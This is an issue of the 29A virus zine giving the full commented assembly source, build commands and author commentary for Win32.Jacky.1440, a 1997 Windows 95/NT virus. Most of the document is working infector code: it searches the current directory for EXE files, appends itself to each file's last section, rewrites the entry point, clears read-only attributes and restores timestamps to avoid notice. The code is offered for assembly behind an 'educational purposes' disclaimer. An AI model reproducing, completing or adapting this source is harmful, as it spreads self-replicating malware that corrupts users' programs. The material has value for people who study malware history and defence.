Copy Link
Add to Bookmark
Report
29A Issue 02 03 07
;
; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
; Win32.Jacky.1440 ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
; by Jacky Qwerty/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
;
; Hello ppl, welcome to the first "Winblowz" 95/NT fully compatible virus.
; Yea i didnt mistype above, it reads "Win32" not "Win95" coz this babe is
; really a "genuine" Win32 virus, which means it should be able to infect
; any Win32 based system: Windoze 95, Windoze NT or Win32s. For some known
; reasonz that i wont delve in detail here, previous Win95 virusez were una-
; ble to spread succesfully under NT. The main reasonz were becoz they asu-
; med KERNEL32 bein loaded at a fixed base adress (not true for NT or even
; future Win95 updatez) and they also made a "guess" about where the Win32
; API functionz were located inside the KERNEL32 itself.
;
; This virus does NOT rely on fixed memory positionz or absolute adressez in
; order to run and spread. It always works at the Win32 API level, not play-
; in its trickz "under the hood". This proves enough for the virus to spread
; succesfully on NT, asumin the user has enough rightz, of course.
;
; Unfortunately, this virus didnt make it as the first Windoze NT virus for
; the media. AVerz said they didnt have an NT machine available for virus
; testin, so they simply didnt test it under NT. Well ehem, thats what they
; said #8S. In the past summer however i finished the codin of Win32.Cabanas
; which is a far superior virus with much more featurez than its predecesor.
; This time, the guyz from Datafellowz and AVP made serious testz with Caba-
; nas under NT until they finally concluded: "Oh miracle! it is able to work
; under NT!". So acordin to the media, Win32.Cabanas is the first WinNT vi-
; rus and not Win32.Jacky as it should have been. Anywayz..
;
;
; Technical description
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; When Win32.Jacky executes, it first looks for KERNEL32 base adress usin
; the GetModuleHandleA API right from the host import table and then it re-
; trieves all other file API function adressez by usin the GetProcAdress API
; also from the import table. These APIz are not inserted by the virus when
; infection, they are only used if they already existed there (very likely),
; but this is not a "must do" for the virus to work tho. After all Win32 API
; functionz needed by the virus have been located, it looks for PE (EXE) fi-
; lez in the current directory and infects them one by one.
;
; When infection starts, each EXE file is opened and maped in shared memory
; usin the "file mapin" API functionz provided by KERNEL32. This proves to
; be a great advance regardin file functionz as it clearly simplifies to a
; large extent the infection process and file handlin in general. After the
; PE signature is detected from the maped file, the virus inspects its im-
; port table lookin for the GetModuleHandleA and GetProcAddress APIz inside
; the KERNEL32 import descriptor. If this module is not imported, the file
; is left alone and discarded. If the GetProcAddress API is not found, the
; virus (later on when it executes) will call its own internal GetProcAd-
; dressET function, which simply inspects the KERNEL32 export table lookin
; for any specified Win32 API function. If GetModuleHandleA is not found the
; file will still get infected but then the virus, in order to find the KER-
; NEL32 base adress, will be relyin on a smoewhat undocumented feature (che-
; cked before use). This feature is very simple: whenever a PE file with un-
; bound KERNEL32 function adressez is loaded, the Win95 loader puts the KER-
; NEL32 adress in the ForwarderChain field of the KERNEL32 import descrip-
; tor. This also works in Win95 OSR2 version but doesnt work on WinNT tho,
; so it should be used with some care after makin some sanity checkz first.
;
; If the GetModuleHandleA and GetProcAddrss APIz are found, the virus will
; hardcode their IAT referencez inside the virus code, then later on when
; the virus executes, it will have these API referencez already waitin to be
; called by the installation code. After the latter API search is done, the
; virus copies itself to the last section in the file, modifies the section
; atributez to acomodate the virus code and finally changes the EntryPoint
; field in the PE header to point to the virus code. The virus doesnt change
; or modify the time/date stamp of infected filez nor it is stoped by the
; "read only" atribute.
;
;
; AVP description
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Before jumpin to the source code, lets read what AVP has to say about the
; virus. Unfortunately as u will see they didnt test the thing on NT, other-
; wise they would have had a big surprise with it hehe #8D
;
; (*) Win95.Jacky - http://www.avp.ch/avpve/newexe/win95/jacky.stm *
;
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
; It is a harmless nonmemory resident parasitic Win95/NT virus 1440
; bytes of length. Being executed the virus scans Win95/NT kernel and
; gets undocumented addresses of system file access function (see the
; list below). Then it searches for NewEXE Portable Executable
; (Win95 and NT) files and writes itself to the end of the file. The
; virus aligns the file length to the section, so the file lengths
; grows more that 1440 bytes while infection.
;
; This is the first known Win95/NT parasitic virus that does not add
; new section to the file - while infecting a file the virus writes
; itself to the end of the file, increases the size of last section
; in the file, and modifies characteristics of this section. So,
; only entry point address, size and characteristics of last section
; are modified in infected files.
;
; This is also first known to me Win95/NT infector that did work on
; my test computer (Windows95) without any problem. I did not try it
; under NT.
;
; The virus contains the encrypted strings, a part of these strings
; are the names of system functions that are used during infection:
;
; KERNEL32 GetModuleHandleA GetProcAddress
; *.EXE
; CreateFileA CreateFileMappingA CloseHandle UnmapViewOfFile
; MapViewOfFile FindFirstFileA FindNextFileA FindClose
; SetFileAttributesA SetFilePointer SetEndOfFile SetFileTime
;
; To My d34d fRi3nD c4b4n4s..
; A Win/NT/95 ViRuS v1.00.
; By: j4cKy Qw3rTy / 29A.
; jqw3rty@cryogen.com
;- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ->8
;
;
; Greetingz
; ÄÄÄÄÄÄÄÄÄ
; And finaly the greetinz go to:
;
; Mr.Chan, Wai ......... Thx for your help and advice.. master!
; MrSandman/29A ........ erm.. when will 29A#2 go out? hehe ;)
; QuantumG ............. What about yer NT resident driver idea?
; DarkSide1 ............ We are Southamerican rockerzzz!
; GriYo/29A ............ Implant poly rulez!
;
;
; Disclaimer
; ÄÄÄÄÄÄÄÄÄÄ
; This source code is for educational purposez only. The author is not res-
; ponsible for any problemz caused due to the assembly of this file.
;
;
; Compiling it
; ÄÄÄÄÄÄÄÄÄÄÄÄ
; tasm32 -ml -m5 -q -zn w32jacky.asm
; tlink32 -Tpe -c -x -aa w32jacky,,, import32
; pewrsec w32jacky.exe
;
;
; (c) 1997 Jacky Qwerty/29A.
.386p
.model flat ;whoaa.. no more segmentz
;Some includez containin very useful structurez and constantz for Win32
include Useful.inc
include Win32API.inc
include MZ.inc
include PE.inc
;Some equ's needed by the virus
work_size equ 4000h ;size to grow up memory maped file
size_pad equ 101 ;size paddin to mark infected filez
v_size equ v_end - v_start ;virus absolute size in filez
extrn GetModuleHandleA :proc ;APIs used durin first generation only
extrn GetProcAddress :proc
.data
db ? ;some dummy data so tlink32 dont yell
.code
;Virus code starts here
v_start:
push eax ;make space to store return adress
pushad ;save all
call get_deltaz ;here we go
;API namez needed by the virus. They will travel in encrypted form
ve_stringz:
veszKernel32 db 'KERNEL32',0
veszGetModuleHandleA db 'GetModuleHandleA',0
veszGetProcAddress db 'GetProcAddress',0
eEXE_filez db '*.EXE',0 ;filez to search
veszCreateFileA db 'CreateFileA',0
veszCreateFileMappingA db 'CreateFileMappingA',0
veszCloseHandle db 'CloseHandle',0
veszUnmapViewOfFile db 'UnmapViewOfFile',0
veszMapViewOfFile db 'MapViewOfFile',0
veszFindFirstFileA db 'FindFirstFileA',0
veszFindNextFileA db 'FindNextFileA',0
veszFindClose db 'FindClose',0
veszSetFileAttributesA db 'SetFileAttributesA',0
veszSetFilePointer db 'SetFilePointer',0
veszSetEndOfFile db 'SetEndOfFile',0
veszSetFileTime db 'SetFileTime',0
eEndOfFunctionNames db 0
;An epitaph to a good friend of mine (not a "junkie" Pete)
db 'To My d34d fRi3nD c4b4n4s..',CRLF
db 'A Win/NT/95 ViRuS v1.00. ',CRLF
db 'By: j4cKy Qw3rTy / 29A. ',CRLF
db 'jqw3rty@cryogen.com',0
ve_string_size = $ - ve_stringz
crypt: lodsb ;decrypt API stringz
rol al,cl
not al
stosb
loop crypt
ret
get_deltaz:
mov ecx,ve_string_size
pop esi ;get pointer to ve_stringz
cld
lea ebp,[esi + v_end - ve_stringz] ;get pointer to virus end
lea eax,[esi + v_start - ve_stringz]
mov edi,ebp
stosd ;save pointer to virus start
add eax,- 12345678h
delta_host = dword ptr $ - 4
stosd ;save current host base adress
lea edi,[ebp + v_stringz - v_end] ;get pointer to API namez
sub eax,- 12345678h
phost_start_rva = dword ptr $ - 4
push edi ;push pointer to "KERNEL32" string
xchg ebx,eax
mov [esp.(Pshd).cPushad.RetAddr],ebx ;save host entry to return
decrypt_stringz:
call crypt ;decrypt encrypted API and stringz
call MyGetModuleHandleA ;get KERNEL32 base adress
jecxz jmp_host_2
mov [ebp + K32Mod - v_end],ecx ;save it
lea esi,[ebp + FunctionNamez - v_end]
lea edi,[ebp + FunctionAddressez - v_end]
GetAPIAddress: ;get adressez of API functionz used by the virus
push esi
call MyGetProcAddressK32 ;get API adress
jmp_host_2:
jecxz jmp_host
cld
xchg eax,ecx
stosd ;save retrieved API adress
lodsb ;point to next API name
test al,al
jnz $ - 3
cmp al,[esi] ;end of API namez reached?
jnz GetAPIAddress ;no, get next API adress
lea ebx,[ebp + FindData - v_end] ;Find filez matchin *.EXE
push ebx
lea eax,[ebp + EXE_filez - v_end]
push eax
call [ebp + ddFindFirstFileA - v_end] ;call FindFirstFileA API
inc eax
jz jmp_host
dec eax
push eax ;save search handle
Process_File: ;check file and infect it
lea edx,[ebx.WFD_szFileName]
call Open&MapFile ;open and map file
jecxz Find_Next
xor eax,eax
cmp [ebx.WFD_nFileSizeHigh],eax ;skip filez too large (>1GB)
jnz Close_File
add eax,[ebx.WFD_nFileSizeLow]
js Close_File
add eax,-80h ;skip filez too short
jnc Close_File
call Check_PE_sign ;it has to be a PE file
jnz Close_File
test ah,IMAGE_FILE_DLL shr 8 ;can't have DLL bit
jnz Close_File
xor ecx,ecx
mov eax,[ebx.WFD_nFileSizeLow] ;check if file is infected
mov cl,size_pad
cdq
div ecx
mov esi,edx ;esi == 0, file already infected or not infectable
;esi != 0, file not infected, i.e. infect it!
Close_File:
call Close&UnmapFile ;close and unmap file
mov ecx,esi
jecxz Find_Next ;jump and find next file
call Infect ;infect file
Find_Next:
pop eax ;find next file
push eax ebx eax
call [ebp + ddFindNextFileA - v_end]
test eax,eax
jnz Process_File
Find_Close:
call [ebp + ddFindClose - v_end] ;no more filez, close search
jmp_host:
popad ;jump to host
ret
Infect proc ;blank file attributez, open and map file in r/w mode,
;infect it, restore date/time stamp and attributez
lea edx,[ebx.WFD_szFileName] ;get filename
push edx 0 edx
call [ebp + ddSetFileAttributesA - v_end] ;blank file attributez
xchg ecx,eax
pop edx
jecxz end_Infect1
mov edi,work_size
add edi,[ebx.WFD_nFileSizeLow]
call Open&MapFileAdj ;open and map file in read/write mode
jecxz end_Infect2
lea esi,[ebp + vszKernel32 - v_end]
lea eax,[ebp + vszGetModuleHandleA - v_end]
push eax esi
lea eax,[ebp + vszGetProcAddress - v_end]
push eax esi ecx
call GetProcAddressIT ;get ptr to GetProcAddress API
mov [ebp + ddGetProcAddress - v_end],eax
push ecx
xor esi,esi
call GetProcAddressIT ;get ptr to GetModuleHandleA API
mov [ebp + ddGetModuleHandleA - v_end],eax
test eax,eax
jnz GetModHandle_found ;if GetModuleHandleA found,
test esi,esi ;jump and attach virus
jz end_Infect3 ;KERNEL32 import descriptor not found,
;then dont infect
x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR
;GetModuleHandleA not found
cmp [esi.ID_TimeDateStamp - x],eax ;check if we can rely on
jz got_easy ;the ForwarderChain trick
cmp eax,[esi.ID_OriginalFirstThunk - x]
jz end_Infect3
mov [esi.ID_TimeDateStamp - x],eax
got_easy:
mov eax,[esi.ID_ForwarderChain - x] ;hardcode pointerz to
mov [ebp + ptrForwarderChain - v_end],edx ;the ForwarderChain
mov [ebp + ddForwarderChain - v_end],eax ;field
GetModHandle_found:
mov esi,[ebp + pv_start - v_end]
call Attach ;attach virus to host
end_Infect3:
call Close&UnmapFileAdj ;close and unmap file
end_Infect2:
mov ecx,[ebx.WFD_dwFileAttributes] ;restore original atribute
jecxz end_Infect1
lea edx,[ebx.WFD_szFileName]
push ecx edx
call [ebp + ddSetFileAttributesA - v_end]
end_Infect1:
ret
Infect endp
Check_PE_sign proc ;checks validity of a PE file
; on entry: EDX = host file size
; ECX = base address of memory-maped file
; EBX = pointer to WIN32_FIND_DATA structure
; EAX = host file size - 80h
; on exit: Zero flag = 1, infectable PE file
; Zero flag = 0, not infectable file
cmp word ptr [ecx],IMAGE_DOS_SIGNATURE ;needs MZ signature
jnz end_check_PE_sign
cmp word ptr [ecx.MZ_lfarlc],40h ;needs Win signature
jb end_check_PE_sign ;(well not necesarily)
mov edi,[ecx.MZ_lfanew] ;get ptr to new exe format
cmp eax,edi ;ptr out of range?
jb end_check_PE_sign
add edi,ecx
cmp dword ptr [edi],IMAGE_NT_SIGNATURE ;check PE signature
jnz end_check_PE_sign
cmp word ptr [edi.NT_FileHeader.FH_Machine], \ ;must be 386+
IMAGE_FILE_MACHINE_I386
jnz end_check_PE_sign
mov eax,dword ptr [edi.NT_FileHeader.FH_Characteristics]
not al
test al,IMAGE_FILE_EXECUTABLE_IMAGE ;must have the executable bit
end_check_PE_sign:
ret
Check_PE_sign endp
Open&MapFile proc ;open and map file in read only mode
; on entry:
; EDX = pszFileName (pointer to file name)
; on exit:
; ECX = 0, if error
; ECX = base adress of memory-maped file, if ok
xor edi,edi
Open&MapFileAdj: ;open and map file in read/write mode
; on entry:
; EDI = file size + work space (in bytes)
; EDX = pszFileName (pointer to file name)
; on exit:
; ECX = 0, if error
; ECX = base adress of memory-maped file, if ok
; EDI = old file size
xor eax,eax
push eax eax OPEN_EXISTING eax eax
mov al,1
ror eax,1
mov ecx,edi
jecxz $+4
rcr eax,1
push eax edx
call [ebp + ddCreateFileA - v_end] ;open file
cdq
inc eax
jz end_Open&MapFile
dec eax
push eax ;push first handle
xor esi,esi
push edx edi edx
mov dl,PAGE_READONLY
mov ecx,edi
jecxz $+4
shl dl,1
push edx esi eax
call [ebp + ddCreateFileMappingA - v_end] ;create file
cdq ;mapping
xchg ecx,eax
jecxz end_Open&MapFile2
push ecx ;push second handle
push edi edx edx
mov dl,FILE_MAP_READ
test edi,edi
jz OMF_RdOnly
shr dl,1
mov edi,[ebx.WFD_nFileSizeLow]
OMF_RdOnly: push edx ecx
call [ebp + ddMapViewOfFile - v_end] ;map view of file
xchg ecx,eax
jecxz end_Open&MapFile3
push ecx ;push base address of
;memory-mapped file
jmp [esp.(3*Pshd).RetAddr] ;jump to return adress leavin
;parameterz in the stack
Open&MapFile endp
Close&UnmapFile proc ;close and unmap file previosly opened in r/o mode
xor edi,edi
Close&UnmapFileAdj: ;close and unmap file previosly opened in r/w mode
pop eax ;return adress
mov [esp.(3*Pshd).RetAddr],eax
call [ebp + ddUnmapViewOfFile - v_end] ;unmap view of file
end_Open&MapFile3:
call [ebp + ddCloseHandle - v_end] ;close handle
mov ecx,edi
jecxz end_Open&MapFile2 ;if read only mode jump
pop eax
push eax eax
xor esi,esi
push esi esi edi eax
xchg edi,eax
call [ebp + ddSetFilePointer - v_end] ;move file pointer to
;the real end of file
call [ebp + ddSetEndOfFile - v_end] ;truncate file at
lea eax,[ebx.WFD_ftLastWriteTime] ;real end of file
push eax esi esi edi
call [ebp + ddSetFileTime - v_end] ;restore original
;date/time stamp
end_Open&MapFile2:
call [ebp + ddCloseHandle - v_end] ;close handle
end_Open&MapFile:
xor ecx,ecx
ret
Close&UnmapFile endp
Attach proc ;attach virus code to last section in the PE file and
; change section characteristicz to reflect infection
;on entry:
; ECX = base of memory-maped file
; ESI = pointer to start of virus code
;on exit:
; EDI = new file size
pushad
push ecx
mov ebp,ecx ;get base adress
add ebp,[ebp.MZ_lfanew] ;get PE header base
movzx ecx,word ptr [ebp.NT_FileHeader \ ;get Number of Sections
.FH_NumberOfSections]
xor eax,eax
movzx edi,word ptr [ebp.NT_FileHeader \ ;get 1st section header
.FH_SizeOfOptionalHeader]
x = IMAGE_SIZEOF_SECTION_HEADER
mov al,x
mul ecx ;get last section header
pop edx
jecxz end_Attach2
add edi,eax
lea ebx,[ebp.NT_OptionalHeader + edi]
mov ecx,[ebx.SH_SizeOfRawData - x]
mov eax,[ebx.SH_VirtualSize - x]
cmp ecx,eax
jnc $+3
xchg eax,ecx
add edx,[ebx.SH_PointerToRawData - x]
sub eax,-3
mov ecx,(v_size + 3)/4
and al,-4
lea edi,[eax+edx] ;find pointer in last section where virus
cld ;will be copied
rep movsd ;copy virus
add eax,[ebx.SH_VirtualAddress - x] ;calculate virus entry point
mov ecx,[ebp.NT_OptionalHeader.OH_FileAlignment] ;in RVA
end_Attach2:
jecxz end_Attach
push eax ;virus entry point
lea esi,[edi + (phost_start_rva - v_start) - ((v_size + 3) \
and (-4))]
neg eax
sub edi,edx
mov [esi + delta_host - phost_start_rva],eax ;harcode delta to
lea eax,[ecx+edi-1] ;host base adress
cdq ;edx=0
sub edx,[ebp.NT_OptionalHeader.OH_AddressOfEntryPoint]
mov [esi],edx ;hardcode delta to original entry point RVA
cdq ;edx=0
div ecx
pop esi ;virus entry point
mul ecx ;calculate new size of section (raw data)
xchg eax,edi
mov ecx,[ebp.NT_OptionalHeader.OH_SectionAlignment]
add eax,(virtual_end - v_end + 3) and (-4)
jecxz end_Attach
cmp [ebx.SH_VirtualSize - x],eax
jnc n_vir
mov [ebx.SH_VirtualSize - x],eax ;store new size of section (RVA)
n_vir: dec eax
mov [ebx.SH_SizeOfRawData - x],edi ;store new size of section
add eax,ecx ;(raw data)
div ecx
mul ecx
add eax,[ebx.SH_VirtualAddress - x]
cmp [ebp.NT_OptionalHeader.OH_SizeOfImage],eax
jnc n_img
mov [ebp.NT_OptionalHeader.OH_SizeOfImage],eax ;store new size
;of image (RVA)
n_img: add edi,[ebx.SH_PointerToRawData - x] ;get new file size
sub ecx,ecx
or byte ptr [ebx.SH_Characteristics.hiw.hib - x],0E0h ;change
; (IMAGE_SCN_MEM_EXECUTE or \ ;section characte-
; IMAGE_SCN_MEM_READ or \ ;risticz to: execute,
; IMAGE_SCN_MEM_WRITE) shr 12 ;read & write access
pop eax ;get original file size
mov cl,size_pad
cdq ; edx=0
cmp edi,eax ;compare it with new file size
jc $+3
xchg edi,eax ;take the greater
sub eax,1 - size_pad
div ecx
mul ecx ;grow file size to a multiple of size_pad
push eax
mov [ebp.NT_OptionalHeader.OH_AddressOfEntryPoint],esi ;change
;entry point
end_Attach:
popad
ret
Attach endp
GetProcAddressIT proc ;gets a pointer to an API function from the Import Table
; (the object inspected is in raw form, ie memory-maped)
;on entry:
; TOS+0Ch (Arg3): API function name
; TOS+08h (Arg2): module name
; TOS+04h (Arg1): base adress of memory-maped file
; TOS+00h (return adress)
;on exit:
; EAX = RVA pointer to IAT entry
; EAX = 0, if not found
pushad
mov ebp,[esp.cPushad.Arg1] ;get Module Handle from Arg1
lea esi,[ebp.MZ_lfanew]
add esi,[esi] ;get address of PE header + MZ_lfanew
mov ecx,[esi.NT_OptionalHeader \ ;get size of import directory
.OH_DirectoryEntries \
.DE_Import \
.DD_Size \
-MZ_lfanew]
jecxz End_GetProcAddressIT2 ;if size is zero, no API imported!
movzx ecx,word ptr [esi.NT_FileHeader \ ;get number of sectionz
.FH_NumberOfSections \
-MZ_lfanew]
jecxz End_GetProcAddressIT2
movzx ebx,word ptr [esi.NT_FileHeader \ ;get 1st section header
.FH_SizeOfOptionalHeader \
-MZ_lfanew]
lea ebx,[esi.NT_OptionalHeader + ebx - MZ_lfanew]
x = IMAGE_SIZEOF_SECTION_HEADER
match_virtual: ;find section containin the import table. (not necesarily
;its in the .idata section!)
mov edi,[esi.NT_OptionalHeader \ ;get address of import table
.OH_DirectoryEntries \
.DE_Import \
.DD_VirtualAddress \
-MZ_lfanew]
mov edx,[ebx.SH_VirtualAddress] ;get RVA start pointer of
sub edi,edx ;current section
add ebx,x
cmp edi,[ebx.SH_VirtualSize - x] ;address of import table
;inside current section?
jb import_section_found ;yea, we found it
loop match_virtual ;no, try next section
jmp End_GetProcAddressIT ;no more sectionz, shit.. go
import_section_found:
push edi
mov eax,[ebx.SH_SizeOfRawData - x]
mov ebx,[ebx.SH_PointerToRawData - x]
xchg ebp,eax ;get RAW size of import section (EBP)
add ebx,eax ;get RAW start of import section (EBX)
cld
x = IMAGE_SIZEOF_IMPORT_DESCRIPTOR
Get_DLL_Name: ;scan each import descriptor inside import section to match
;module name specified
pop esi ;diference (if any) between start
;of imp.table and start of imp.section
mov ecx,[ebx.esi.ID_Name] ;get RVA pointer to imp.module name
End_GetProcAddressIT2:
jecxz End_GetProcAddressIT ;end of import descriptorz?
sub ecx,edx ;convert RVA pointer to RAW
cmp ecx,ebp ;check if it points inside section
jae End_GetProcAddressIT
add esi,x
push esi ;save next import descriptor for later
lea esi,[ebx + ecx] ;retrieval
mov edi,[esp.(Pshd).cPushad.Arg2] ;get module name specified
;from Arg2
Next_char_from_DLL: ;do a char by char comparison with module name found
;inside section. Stop when a NULL or a dot is found
lodsb
add al,-'.'
jz IT_nup ;its a dot
sub al,-'.'+'a'
cmp al, 'z'-'a'+ 1
jae no_up
add al,-20h ;convert to upercase
no_up: sub al,-'a'
IT_nup: scasb
jnz Get_DLL_Name ;names dont match, get next import descriptor
cmp byte ptr [edi-1],0
jnz Next_char_from_DLL
Found_DLL_name: ;we got the import descriptor containin specified module name
pop esi
lea eax,[edx + esi.ID_ForwarderChain - x]
add esi,ebx
mov [esp.Pushad_edx],eax ;store ptr to ForwarderChain for l8r
mov [esp.Pushad_esi],esi ;store ptr to imp.descriptor for l8r
push dword ptr [esp.cPushad.Arg3]
mov eax,[esp.(Pshd).Pushad_ebp]
push dword ptr [eax + K32Mod - v_end]
call GetProcAddressET ;scan exp.table of spec.module handle
xchg eax,ecx ;and get function adress of spec.API
mov ecx,[esi.ID_FirstThunk - x] ;This is needed just in case the
;API function adressez are bound
jecxz End_GetProcAddressIT ;if not found then go, this value cant
;be zero or the IAT wont be patched
push eax
call GetProcAddrIAT ;inspect first thunk (which later will
test eax,eax ;be patched by the loader)
jnz IAT_found ;if found then jump (save it and go)
mov ecx,[esi.ID_OriginalFirstThunk - x] ;get original thunk
;(which later will hold the original
;unpatched IAT)
jecxz End_GetProcAddressIT ;if not found then go, this value
push eax ;could be zero
call GetProcAddrIAT ;inspect original thunk
test eax,eax
jz IAT_found ;jump if not found
sub eax,ecx ;we got the pointer
add eax,[esi.ID_FirstThunk - x] ;convert it to RVA
db 6Bh,33h,0C0h ;imul esi,[ebx],-0C0h ;bizarre! but no jump
org $ - 2 ;necesary!
End_GetProcAddressIT:
db 33h,0C0h ;xor eax,eax ;error, adress not found
IAT_found:
mov [esp.Pushad_eax],eax ;save IAT entry pointer
popad
ret (3*Pshd) ;go and unwind parameterz in stack
GetProcAddrIAT: ;this function scans the IMAGE_THUNK_DATA array of "dwords"
; from the selected IMAGE_IMPORT_DESCRIPTOR, searchin for
; the selected API name. This function works for both
; bound and unbound import descriptorz. This function is
; called from inside GetProcAddressIT.
;on entry:
; EBX = RAW start pointer of import section
; ECX = RVA pointer to IMAGE_THUNK_ARRAY
; EDX = RVA start pointer of import section
; EDI = pointer selected API function name.
; EBP = RAW size of import section
; TOS+04h (Arg1): real address of API function inside selected
; module (in case the descriptor is unbound).
; TOS+00h (return adress)
;on exit:
; EAX = RVA pointer to IAT entry
; EAX = 0, if not found
push ecx
push esi
xor eax,eax
sub ecx,edx
cmp ecx,ebp
jae IT_not_found
lea esi,[ebx + ecx] ;get RAW pointer to IMAGE_THUNK_DATA array
next_thunk_dword:
lodsd ;get dword value
test eax,eax ;end of IMAGE_THUNK_DATA array?
jz IT_not_found
no_ordinal:
sub eax,edx ;convert dword to a RAW pointer
cmp eax,ebp ;dword belongs to an unbound image descriptor?
jb IT_search ;no, jump
add eax,edx ;we have the API adress, reconvert to RVA
cmp eax,[esp.(2*Pshd).Arg1] ;API adressez match?
jmp IT_found? ;yea, we found it, jump
IT_search:
push esi ;image descr.contains imports by name
lea esi,[ebx+eax.IBN_Name] ;get API name from import descriptor
mov edi,[esp.(5*Pshd).cPushad.Arg3] ;get API name selected as a
;parameter
IT_next_char:
;find req.API from all imported API namez
cmpsb ;do APIz match?
jnz IT_new_search ;no, continue searchin
IT_Matched_char:
cmp byte ptr [esi-1],0
jnz IT_next_char
IT_new_search:
pop esi ;yea, they match, we found it
IT_found?:
jnz next_thunk_dword
lea eax,[edx+esi-4] ;get the pointer to the new IAT entry
sub eax,ebx ;convert it to RVA
IT_not_found:
pop esi
pop ecx
ret (Pshd)
GetProcAddressIT endp
GetProcAddressET proc ;This function is similar to GetProcAddressIT except
; that it looks for API functions in the export table
; of a given DLL module. It has the same functionality
; as the original GetProcAddress API exported from
; KERNEL32 except that it is able to find API
; functions exported by ordinal from KERNEL32.
;on entry:
; TOS+08h (Arg2): pszAPIname (pointer to API name)
; TOS+04h (Arg1): module handle/base address of module
; TOS+00h (return adress)
;on exit:
; ECX = API function address
; ECX = 0, if not found
pushad
mov eax,[esp.cPushad.Arg1] ;get Module Handle from Arg1
mov ebx,eax
add eax,[eax.MZ_lfanew] ;get address of PE header
mov ecx,[eax.NT_OptionalHeader \ ;get size of Export directory
.OH_DirectoryEntries \
.DE_Export \
.DD_Size]
jecxz Proc_Address_not_found ;size is zero, No API exported !
mov ebp,ebx ;get address of Export directory
add ebp,[eax.NT_OptionalHeader \
.OH_DirectoryEntries \
.DE_Export \
.DD_VirtualAddress]
ifndef NoOrdinal
mov eax,[esp.cPushad.Arg2] ;get address of requested API name or
;ordinal value from Arg2
test eax,-10000h ;check if Arg2 is an ordinal
jz Its_API_ordinal
endif
Its_API_name:
push ecx
mov edx,ebx ;get address of exported API names
add edx,[ebp.ED_AddressOfNames]
mov ecx,[ebp.ED_NumberOfNames] ;get number of exported API names
xor eax,eax
cld
Search_for_API_name:
mov esi,ebx ;get address of next exported API name
add esi,[edx+eax*4]
mov edi,[esp.Pshd.cPushad.Arg2] ;get address of requested API name
;from Arg2
Next_Char_in_API_name:
cmpsb ;find requested API from all
jz Matched_char_in_API_name ;exported API namez
inc eax
loop Search_for_API_name
pop eax
Proc_Address_not_found:
xor eax,eax ;API not found
jmp End_GetProcAddressET
ifndef NoOrdinal
Its_API_ordinal:
sub eax,[ebp.ED_BaseOrdinal] ;normalize Ordinal, i.e.
jmp Check_Index ;convert it to an index
endif
Matched_char_in_API_name:
cmp byte ptr [esi-1],0 ;end of API name reached?
jnz Next_Char_in_API_name
pop ecx
mov edx,ebx ;get address of exp.API ordinals
add edx,[ebp.ED_AddressOfOrdinals]
movzx eax,word ptr [edx+eax*2] ;get index into exp.API functions
Check_Index:
cmp eax,[ebp.ED_NumberOfFunctions] ;check for out of range index
jae Proc_Address_not_found
mov edx,ebx ;get address of exported API functions
add edx,[ebp.ED_AddressOfFunctions]
add ebx,[edx+eax*4] ;get address of requested API function
mov eax,ebx
sub ebx,ebp ;take care of forwarded API functions
cmp ebx,ecx
jb Proc_Address_not_found
End_GetProcAddressET:
mov [esp.Pushad_ecx],eax ;set requested Proc Address, if found
popad
ret (2*Pshd)
GetProcAddressET endp
MyGetProcAddressK32: ;this function is simply a wraper to the GetProcAddress
; API. It retrieves the address of an API function
; exported from KERNEL32.
;on entry:
; TOS+04h (Arg1): pszAPIname (pointer to API name)
; TOS+00h (return adress)
;on exit:
; ECX = API function address
; ECX = 0, if not found
pop eax
push dword ptr [ebp + K32Mod - v_end] ;KERNEL32 module handle
push eax
MyGetProcAddress proc
mov ecx,12345678h ;this dynamic variable will hold an RVA
ddGetProcAddress = dword ptr $ - 4 ;pointer to the GetProcAddress API in
;the IAT
gotoGetProcAddressET:
jecxz GetProcAddressET
push [esp.Arg2]
push [esp.(Pshd).Arg1]
add ecx,[ebp + phost_hdr - v_end]
call [ecx] ;call the original GetProcAddress API
xchg ecx,eax
jecxz gotoGetProcAddressET ;if error, call my own GetProcAddress
ret (2*Pshd) ;function
MyGetProcAddress endp
MyGetModuleHandleA proc ;this function retrieves the base address/module
;handle of a DLL module previosly loaded to memory.
pop ecx
pop eax
push ecx
mov edx,[ebp + phost_hdr - v_end]
mov ecx,12345678h ;this dynamic variable will hold an RVA
ddGetModuleHandleA = dword ptr $ - 4 ;pointer to the GetModuleHandleA API in
jecxz check_K32 ;the IAT
GetModHandleA:
push eax
call [ecx + edx] ;call the original GetModuleHandleA API
xor ecx,ecx
jmp really_PE?
check_K32:
mov eax,[edx + 12345678h] ;this dynamic variable will hold an
;RVA pointer to the ForwarderChain
;field in the KERNEL32 import
;descriptor. This is an undocumented
ptrForwarderChain = dword ptr $ - 4 ;feature to get the K32 base address
inc eax
jz End_GetModHandleA ;make sure the base address is ok
dec eax
jz End_GetModHandleA
cmp eax,12345678h ;this dynamic variable will hold the
;prev.contents of the ForwarderChain
;field in the K32 import descriptor
ddForwarderChain = dword ptr $ - 4 ;if they match, then the Win32 loader
jz End_GetModHandleA ;didnt copy the K32 base address
really_PE?:
cmp word ptr [eax],IMAGE_DOS_SIGNATURE ;make sure its the base
jnz End_GetModHandleA ;address of a PE module
mov edx,[eax.MZ_lfanew]
cmp dword ptr [eax + edx],IMAGE_NT_SIGNATURE
jnz End_GetModHandleA
xchg ecx,eax
End_GetModHandleA:
ret
MyGetModuleHandleA endp
align 4 ;set dword alignment
v_end:
;uninitialized data ;these variablez will be addressed in memory, but
;dont waste space in the file
pv_start dd ? ;pointer to virus start in memory
phost_hdr dd ? ;ptr to the host base address in mem
K32Mod dd ? ;KERNEL32 base address
FunctionAddressez: ;these variables will hold the API function addressez
;used in the virus
ddCreateFileA dd ?
ddCreateFileMappingA dd ?
ddCloseHandle dd ?
ddUnmapViewOfFile dd ?
ddMapViewOfFile dd ?
ddFindFirstFileA dd ?
